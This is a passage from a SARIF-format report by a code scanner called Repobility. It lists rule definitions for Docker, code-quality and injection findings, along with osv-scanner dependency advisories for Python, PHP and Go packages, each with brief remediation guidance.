{"version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [{"tool": {"driver": {"name": "Repobility", "informationUri": "https://repobility.com", "rules": [{"id": "JRN002", "name": "Browser storage is used for session token material", "shortDescription": {"text": "Browser storage is used for session token material"}, "fullDescription": {"text": "localStorage and sessionStorage are readable by injected JavaScript. For sensitive sessions, this turns XSS into account compromise."}, "properties": {"scanner": "repobility-journey-contract", "category": "auth", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "GHSA-65pc-fj4g-8rjx", "name": "idna: GHSA-65pc-fj4g-8rjx", "shortDescription": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "fullDescription": {"text": "Internationalized Domain Names in Applications (IDNA): Specially crafted inputs to idna.encode() can bypass CVE-2024-3651 fix"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-jg22-mg44-37j8", "name": "aiohttp: GHSA-jg22-mg44-37j8", "shortDescription": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "fullDescription": {"text": "AIOHTTP is Vulnerable to Deserialization of Untrusted Data"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-hg6j-4rv6-33pg", "name": "aiohttp: GHSA-hg6j-4rv6-33pg", "shortDescription": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "fullDescription": {"text": "AIOHTTP is vulnerable to cross-origin redirect with per-request cookies"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-83wp-f5c3-hqqr", "name": "laravel/framework: GHSA-83wp-f5c3-hqqr", "shortDescription": {"text": "laravel/framework: GHSA-83wp-f5c3-hqqr"}, "fullDescription": {"text": "Laravel 
framework susceptible to reflected cross-site scripting"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-78fx-h6xr-vch4", "name": "laravel/framework: GHSA-78fx-h6xr-vch4", "shortDescription": {"text": "laravel/framework: GHSA-78fx-h6xr-vch4"}, "fullDescription": {"text": "Laravel has a File Validation Bypass"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-546h-56qp-8jmw", "name": "laravel/framework: GHSA-546h-56qp-8jmw", "shortDescription": {"text": "laravel/framework: GHSA-546h-56qp-8jmw"}, "fullDescription": {"text": "Laravel framework susceptible to reflected cross-site scripting"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "medium", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "DKR002", "name": "Dockerfile base image has no explicit tag", "shortDescription": {"text": "Dockerfile base image has no explicit tag"}, "fullDescription": {"text": "Images without explicit tags resolve to a mutable default tag, which weakens reproducibility and review."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.9, "cwe": "", "owasp": ""}}, {"id": "DKR001", "name": "Docker final stage has no non-root USER", "shortDescription": {"text": "Docker final stage has no non-root USER"}, "fullDescription": {"text": "Docker images run as root unless the image or Dockerfile switches to a non-root user."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "DKR014", "name": "Dockerfile copies broad context with incomplete .dockerignore", "shortDescription": {"text": "Dockerfile copies broad context with incomplete .dockerignore"}, "fullDescription": {"text": "COPY . or ADD . 
is safer when .dockerignore excludes secrets, git history, keys, and generated artifacts."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.76, "cwe": "", "owasp": ""}}, {"id": "SEC119", "name": "[SEC119] World-writable / world-readable file permissions: World-writable files let any local user (or container neighbo", "shortDescription": {"text": "[SEC119] World-writable / world-readable file permissions: World-writable files let any local user (or container neighbor) tamper with data; world-readable files leak secrets."}, "fullDescription": {"text": "Use 0600 (owner rw only) for secrets, 0644 for general files, 0700 for directories with secrets. Java: `setReadable(true, true)` (owner-only)."}, "properties": {"scanner": "repobility-threat-engine", "category": "security", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC042", "name": "[SEC042] SQL identifier injection via f-string in cursor execute: f-string SQL normalizes an unsafe pattern. Currently s", "shortDescription": {"text": "[SEC042] SQL identifier injection via f-string in cursor execute: f-string SQL normalizes an unsafe pattern. Currently safe when only trusted internal values are interpolated (e.g. self._table in Odoo), but a future contributor can extend t"}, "fullDescription": {"text": "Use psycopg2.sql.SQL() + sql.Identifier() for identifiers:\n  from psycopg2 import sql\n  cr.execute(sql.SQL('UPDATE {} SET x=%s').format(sql.Identifier(table)), (value,))\nNever use f-string in cr.execute(). Values go through %s parameters."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC015", "name": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. 
Output is predictable.", "shortDescription": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "fullDescription": {"text": "Use secrets module (Python) or crypto.getRandomValues() (JS) for security-sensitive randomness."}, "properties": {"scanner": "repobility-threat-engine", "category": "crypto", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC136", "name": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns ", "shortDescription": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, retur"}, "fullDescription": {"text": "Catch the specific exception type, log at error level with full exception info, and return a failure-shaped result. If the operation is genuinely best-effort, log at warning and document why in a comment so the next reader (or scanner) knows."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "COMP001", "name": "[COMP001] High cognitive complexity: Function `check_skill_frontmatter` has cognitive complexity 17 (SonarSource scale).", "shortDescription": {"text": "[COMP001] High cognitive complexity: Function `check_skill_frontmatter` has cognitive complexity 17 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and"}, "fullDescription": {"text": "Extract nested branches into named helper functions; flatten early-return / guard clauses; replace long if/elif chains with dispatch dicts or polymorphism. 
SonarQube's threshold for 'should refactor' is 15 \u2014 yours is 17."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "SEC045", "name": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a latera", "shortDescription": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use obj"}, "fullDescription": {"text": "For literal data structures: use ast.literal_eval(text) \u2014 only parses literals, raises on code.\nFor formula evaluation: use asteval or simpleeval (purpose-built sandboxes with allow-lists).\nFor Odoo: use odoo.tools.safe_eval(expr, locals_dict, mode='exec').\nIf you genuinely need to execute admin-stored code: require explicit super-admin permission AND log every execution with a stack trace."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "AGT013", "name": "Agent auto-approve or skip-permissions mode is easy to enable", "shortDescription": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "fullDescription": {"text": "Codex/agent auto-approve, YOLO, or skip-permissions modes can be useful in isolated automation, but they remove the human checkpoint before command execution, network access, and file edits."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.68, "cwe": "", "owasp": ""}}, {"id": "AGT007", "name": "localStorage write failures are swallowed silently", "shortDescription": {"text": "localStorage write failures are swallowed silently"}, "fullDescription": {"text": "localStorage 
quotas are small and writes can fail. Catching storage errors without a user-visible warning causes silent data loss when notes, images, or snapshots exceed quota."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.8, "cwe": "", "owasp": ""}}, {"id": "DEPCUR-NPM", "name": "npm package `@vitejs/plugin-react` is 1 major version(s) behind (^5.0.4 -> 6.0.2)", "shortDescription": {"text": "npm package `@vitejs/plugin-react` is 1 major version(s) behind (^5.0.4 -> 6.0.2)"}, "fullDescription": {"text": "`@vitejs/plugin-react` is pinned/resolved at ^5.0.4 but the latest stable release on the npm registry is 6.0.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise."}, "properties": {"scanner": "repobility-dependency-currency", "category": "dependency", "severity": "medium", "confidence": 0.9, "cwe": "", "owasp": ""}}, {"id": "MINED111", "name": "Bare except continues silently", "shortDescription": {"text": "Bare except continues silently"}, "fullDescription": {"text": "Bare `except:` (or `except Exception:`) that runs code without re-raising or logging the exception. Hides real failures and makes bugs hard to diagnose."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "CORE_LARGE_FILES", "name": "Average file size is 503 lines (recommend <300)", "shortDescription": {"text": "Average file size is 503 lines (recommend <300)"}, "fullDescription": {"text": "Refactor large files by extracting related functions into separate modules. Target files with 300+ lines first. 
Use the Single Responsibility Principle \u2014 each module should have one clear purpose."}, "properties": {"scanner": "repobility-core", "category": "quality", "severity": "medium", "confidence": null, "cwe": "", "owasp": ""}}, {"id": "DKR012", "name": "Dockerfile keeps pip download cache", "shortDescription": {"text": "Dockerfile keeps pip download cache"}, "fullDescription": {"text": "Pip's package cache increases image size and can preserve unnecessary artifacts."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "low", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "DKR008", "name": ".dockerignore misses sensitive defaults", "shortDescription": {"text": ".dockerignore misses sensitive defaults"}, "fullDescription": {"text": ".dockerignore exists but does not cover common secret or VCS patterns."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "low", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "SEC004", "name": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection.", "shortDescription": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "fullDescription": {"text": "Use parameterized queries: connection.execute('SELECT * FROM t WHERE id = ?', [id]). For dynamic table or column names, choose identifiers from a hard-coded allowlist and keep values in parameters."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "low", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "AIC003", "name": "Duplicated implementation block across source files", "shortDescription": {"text": "Duplicated implementation block across source files"}, "fullDescription": {"text": "Duplicated blocks are a common artifact when generated code is pasted or recreated instead of reused. 
They increase maintenance cost because every future bug fix must be found in multiple locations."}, "properties": {"scanner": "repobility-ai-code-hygiene", "category": "quality", "severity": "low", "confidence": 0.86, "cwe": "", "owasp": ""}}, {"id": "MINED043", "name": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.", "shortDescription": {"text": "[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-319 / A02:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED067", "name": "[MINED067] Python Requests No Timeout: requests.get/post/etc. without timeout= can hang forever.", "shortDescription": {"text": "[MINED067] Python Requests No Timeout: requests.get/post/etc. without timeout= can hang forever."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-400 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC013", "name": "[SEC013] Path Traversal \u2014 User Input in File Path (and 2 more): Same pattern found in 2 additional files. Review if need", "shortDescription": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "fullDescription": {"text": "Use os.path.realpath() and verify the resolved path is inside your expected base directory; compare path components (e.g. with os.path.commonpath()) rather than a raw string prefix, which also matches sibling directories sharing that prefix. 
Use secure_filename() for uploads."}, "properties": {"scanner": "repobility-threat-engine", "category": "path_traversal", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED050", "name": "[MINED050] Stub Only Function (and 3 more): Same pattern found in 3 additional files. Review if needed.", "shortDescription": {"text": "[MINED050] Stub Only Function (and 3 more): Same pattern found in 3 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-1188 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED001", "name": "[MINED001] Bare Except Pass (and 2 more): Same pattern found in 2 additional files. Review if needed.", "shortDescription": {"text": "[MINED001] Bare Except Pass (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-755 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED062", "name": "[MINED062] Python Dataclass No Fields (and 19 more): Same pattern found in 19 additional files. Review if needed.", "shortDescription": {"text": "[MINED062] Python Dataclass No Fields (and 19 more): Same pattern found in 19 additional files. 
Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED056", "name": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order.", "shortDescription": {"text": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-682 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC029", "name": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 11 more): Same pattern found in 11 addi", "shortDescription": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 11 more): Same pattern found in 11 additional files. Review if needed."}, "fullDescription": {"text": "Validate the URL against an allowlist BEFORE fetching:\n  ALLOWED = {'images.example.com', 'cdn.example.com'}\n  host = urlparse(url).hostname\n  if host not in ALLOWED: abort(400)\nOr use a server-side proxy (Imgproxy / serve-files-only-from-S3) that isolates outbound network access from the request handler.\nBlock private CIDRs explicitly: 10/8, 172.16/12, 192.168/16, 169.254/16.\nCheck the IP address the hostname resolves to (not only the hostname string), repeat the check on every redirect, and also cover loopback (127/8) and the IPv6 equivalents."}, "properties": {"scanner": "repobility-threat-engine", "category": "ssrf", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED045", "name": "[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong.", "shortDescription": {"text": "[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong."}, "fullDescription": {"text": "Review and fix per the pattern semantics. 
See CWE-476 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED044", "name": "[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.", "shortDescription": {"text": "[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-532 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "JRN009", "name": "Secret-like setting is echoed into a password input value", "shortDescription": {"text": "Secret-like setting is echoed into a password input value"}, "fullDescription": {"text": "Settings screens sometimes render API keys, tokens, or passwords back into HTML/JSX password fields. That still exposes the secret to page source, browser extensions, screenshots, and DOM scraping."}, "properties": {"scanner": "repobility-journey-contract", "category": "auth", "severity": "high", "confidence": 0.83, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-161", "name": "starlette: PYSEC-2026-161", "shortDescription": {"text": "starlette: PYSEC-2026-161"}, "fullDescription": {"text": "BadHost: Missing Host header validation poisons request.url.path, bypassing path-based security checks"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-179", "name": "pyjwt: PYSEC-2026-179", "shortDescription": {"text": "pyjwt: PYSEC-2026-179"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. 
Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0."}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-178", "name": "pyjwt: PYSEC-2026-178", "shortDescription": {"text": "pyjwt: PYSEC-2026-178"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0."}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-177", "name": "pyjwt: PYSEC-2026-177", "shortDescription": {"text": "pyjwt: PYSEC-2026-177"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. 
The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker's control. This vulnerability is fixed in 2.13.0."}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "PYSEC-2026-175", "name": "pyjwt: PYSEC-2026-175", "shortDescription": {"text": "pyjwt: PYSEC-2026-175"}, "fullDescription": {"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. 
The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku "}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-5039", "name": "stdlib: GO-2026-5039", "shortDescription": {"text": "stdlib: GO-2026-5039"}, "fullDescription": {"text": "Arbitrary inputs are included in errors without any escaping in net/textproto"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-5038", "name": "stdlib: GO-2026-5038", "shortDescription": {"text": "stdlib: GO-2026-5038"}, "fullDescription": {"text": "Quadratic complexity in WordDecoder.DecodeHeader in mime"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-5037", "name": "stdlib: GO-2026-5037", "shortDescription": {"text": "stdlib: GO-2026-5037"}, "fullDescription": {"text": "Inefficient candidate hostname parsing in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4986", "name": "stdlib: GO-2026-4986", "shortDescription": {"text": "stdlib: GO-2026-4986"}, "fullDescription": {"text": "Quadratic string concatenation in consumeComment in net/mail"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4982", "name": "stdlib: GO-2026-4982", "shortDescription": {"text": "stdlib: GO-2026-4982"}, "fullDescription": {"text": "Bypass of meta content URL escaping causes XSS in html/template"}, "properties": {"scanner": 
"category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4981", "name": "stdlib: GO-2026-4981", "shortDescription": {"text": "stdlib: GO-2026-4981"}, "fullDescription": {"text": "Crash when handling long CNAME response in net"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4980", "name": "stdlib: GO-2026-4980", "shortDescription": {"text": "stdlib: GO-2026-4980"}, "fullDescription": {"text": "Escaper bypass leads to XSS in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4977", "name": "stdlib: GO-2026-4977", "shortDescription": {"text": "stdlib: GO-2026-4977"}, "fullDescription": {"text": "Quadratic string concatenation in consumePhrase in net/mail"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4976", "name": "stdlib: GO-2026-4976", "shortDescription": {"text": "stdlib: GO-2026-4976"}, "fullDescription": {"text": "ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4971", "name": "stdlib: GO-2026-4971", "shortDescription": {"text": "stdlib: GO-2026-4971"}, "fullDescription": {"text": "Panic in Dial and LookupPort when handling NUL byte on Windows in net"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4947", "name": "stdlib: GO-2026-4947", "shortDescription": {"text": "stdlib: GO-2026-4947"}, "fullDescription": {"text": "Unexpected work during chain building in crypto/x509"}, "properties": {"scanner": 
"osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4946", "name": "stdlib: GO-2026-4946", "shortDescription": {"text": "stdlib: GO-2026-4946"}, "fullDescription": {"text": "Inefficient policy validation in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4918", "name": "stdlib: GO-2026-4918", "shortDescription": {"text": "stdlib: GO-2026-4918"}, "fullDescription": {"text": "Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4870", "name": "stdlib: GO-2026-4870", "shortDescription": {"text": "stdlib: GO-2026-4870"}, "fullDescription": {"text": "Unauthenticated TLS 1.3 KeyUpdate record can cause persistent connection retention and DoS in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4869", "name": "stdlib: GO-2026-4869", "shortDescription": {"text": "stdlib: GO-2026-4869"}, "fullDescription": {"text": "Unbounded allocation for old GNU sparse in archive/tar"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4865", "name": "stdlib: GO-2026-4865", "shortDescription": {"text": "stdlib: GO-2026-4865"}, "fullDescription": {"text": "JsBraceDepth Context Tracking Bugs (XSS) in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4864", "name": "stdlib: GO-2026-4864", "shortDescription": {"text": "stdlib: GO-2026-4864"}, "fullDescription": {"text": 
"TOCTOU permits root escape on Linux via Root.Chmod in os in internal/syscall/unix"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4603", "name": "stdlib: GO-2026-4603", "shortDescription": {"text": "stdlib: GO-2026-4603"}, "fullDescription": {"text": "URLs in meta content attribute actions are not escaped in html/template"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4602", "name": "stdlib: GO-2026-4602", "shortDescription": {"text": "stdlib: GO-2026-4602"}, "fullDescription": {"text": "FileInfo can escape from a Root in os"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4601", "name": "stdlib: GO-2026-4601", "shortDescription": {"text": "stdlib: GO-2026-4601"}, "fullDescription": {"text": "Incorrect parsing of IPv6 host literals in net/url"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4342", "name": "stdlib: GO-2026-4342", "shortDescription": {"text": "stdlib: GO-2026-4342"}, "fullDescription": {"text": "Excessive CPU consumption when building archive index in archive/zip"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4341", "name": "stdlib: GO-2026-4341", "shortDescription": {"text": "stdlib: GO-2026-4341"}, "fullDescription": {"text": "Memory exhaustion in query parameter parsing in net/url"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4340", "name": "stdlib: GO-2026-4340", "shortDescription": {"text": "stdlib: GO-2026-4340"}, 
"fullDescription": {"text": "Handshake messages may be processed at the incorrect encryption level in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2026-4337", "name": "stdlib: GO-2026-4337", "shortDescription": {"text": "stdlib: GO-2026-4337"}, "fullDescription": {"text": "Unexpected session resumption in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4175", "name": "stdlib: GO-2025-4175", "shortDescription": {"text": "stdlib: GO-2025-4175"}, "fullDescription": {"text": "Improper application of excluded DNS name constraints when verifying wildcard names in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4155", "name": "stdlib: GO-2025-4155", "shortDescription": {"text": "stdlib: GO-2025-4155"}, "fullDescription": {"text": "Excessive resource consumption when printing error string for host certificate validation in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4015", "name": "stdlib: GO-2025-4015", "shortDescription": {"text": "stdlib: GO-2025-4015"}, "fullDescription": {"text": "Excessive CPU consumption in Reader.ReadResponse in net/textproto"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4014", "name": "stdlib: GO-2025-4014", "shortDescription": {"text": "stdlib: GO-2025-4014"}, "fullDescription": {"text": "Unbounded allocation when parsing GNU sparse map in archive/tar"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, 
